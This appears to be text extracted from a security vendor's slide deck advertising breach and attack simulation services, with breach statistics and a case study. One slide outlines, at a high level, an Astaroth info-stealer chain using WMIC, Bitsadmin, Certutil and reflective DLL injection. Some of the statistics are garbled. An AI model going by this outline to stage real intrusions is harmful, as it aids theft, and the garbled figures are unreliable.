C O N F I D E N T I A L

C O N F I D E N T I A L

1

1

BREACH & ATTACK

SIMULATION SERVICES

1

BREACH & ATTACK

SIMULATION SERVICES

C O N F I D E N T I A L

CYBERSECURITY

5,2000 number

of IoT device

attacks

48% of email

attachments are

malicious

1 in 13 web

requests lead

to malware

4.1B data

breaches in

2019

$11.5B ransomware

damages with an

attack every 14 sec in

2019

$6.3M average

cost of a breach

Only 5% of

companies’

Folders are

protected

$5.9M cost of

information loss

206 days

Average time to

identify a breach

50 days the

average cost in

time of a malware

attack

2,244 average

number of hacker

attacks in a day

The financial services

industry incurs the highest

cost from cybercrime at an

average of $18.3 million per

organization

Supply-chain

attacks were up by

78% in 2019

Estimated losses in 2019 for the

healthcare industry $25 billion

Quick Facts Leading Industries Impacted

2

$2.6M average

cost of malware

attack on an

organization

314 days:

Average lifecycle

of a breach

C O N F I D E N T I A L

BREACH & ATTACK

Attack begins with spear-phishing email. WMIC downloads an XSL file.

WMIC once again downloads an XSL file. Multiple instances of Bitsadmin download

encoded payloads.

Certutil decodes the download

payloads.

This DLL decrypts and injects another DLL

into userinit.

The DLL that’s loaded into userinit is a proxy that reads, decrypts,

and reflectively loads a final DLL, which is the info-stealer Astaroth.

Email with link Zip Link BAT

Attackers may need to keep

staging attacks until the desired

information is obtained or the

desired access to the Network is

achieved

Once the attacker maintains

access to the system,

exfiltration can indefinitely

proceed

Attackers looks for

weakness he can exploit

1) RESEARCH Phishing email spam with

malware, phone call, dress

like the night janitor etc..

3

WMICDownloadXSL fileJavaScript

WMIC Download XSL file JavaScript

Bitsadmin Download

Regsvr32

Reflective

DLL loading DLL Process hallowingUserinit

Regsvr32 DLL DLL Reflective

DLL loadingDLL Process

injection

CertutilDecodePayloads

2) STAGE ATTACK

SOCIAL

ENGINEERING

INFRASTRUCTURE

WEAKNESS

3) EXFILTRATE

Access data is exfiltrated

back to attacker

HTTP-based path,

FTP, Gopher etc….,

Database and

file servers

C O N F I D E N T I A L

OUTPUT

Detailed reports of the status and performance of security controls and processes

Taxonomy consists of common lexicon that enables business stakeholders, cyber

defenders, and vendors to clearly communicate on the exact nature of a threat and the

objective assessment of the cyber defense plan that can defeat it.

SIMULATIONS

Ransomware attacks, (spear) phishing and whaling attacks, or clicking on

malicious banners and links on websites; full attack and expanded kill chain used

by cyber attackers against enterprise infrastructure using software test points that

allow testing across roaming laptops, user desktops, virtual machines, or cloud

infrastructure.

APPROACH

Methodically select and analyze attacks, compare them to the capabilities of an

organization’s security controls, identify the gaps and mitigate with security controls

aligned to organization’s budgets

Defense-in-depth architecture include detective controls designed to monitor and

alert on anomalous activity

Assess the effectiveness of security procedures, infrastructure, vulnerabilities, and

techniques by using breach and attack simulation Platforms; expose vulnerability

gaps with respective configurations.

BREACH & ATTACK

Response to CISO’s key questions

Marlabs’ Cybersecurity – Methodology

& Frameworks

NIST MITRE

What is our risk of a

successful breach threat

actors such as APT29?

Are we protected, such

as against APT29?

4

C O N F I D E N T I A L

ENGAGEMENT MODEL

Assessments

Workshops

Implementation & deployment

Managed Services

5

C O N F I D E N T I A L

CASE STUDY: BREACH AND ATTACK SIMULATION

Business

Challenges

Solution

Highlights

Business

Benefits

Proactive threat

mitigation

ClientGlobal Media and digital marketing firm in the US, Europe & APAC

Validate security controls against APT’s Incident response readiness

Report weaknesses in

each phase of kill chain

Workshop based delivery

model

Recommendation on

detection improvement

Coverage of TTP’s

w.r.t MITRE Attack

Matrix

Improved visibility Augmented security

controlsMaximized existing cyber

security investments

6

C O N F I D E N T I A L

C O N F I D E N T I A L

BRINGING TOGETHER

TECHNOLOGY, CULTURE AND VALUETO HELP ENTERPRISES GET READY FOR CHANGE

THANK YOU

7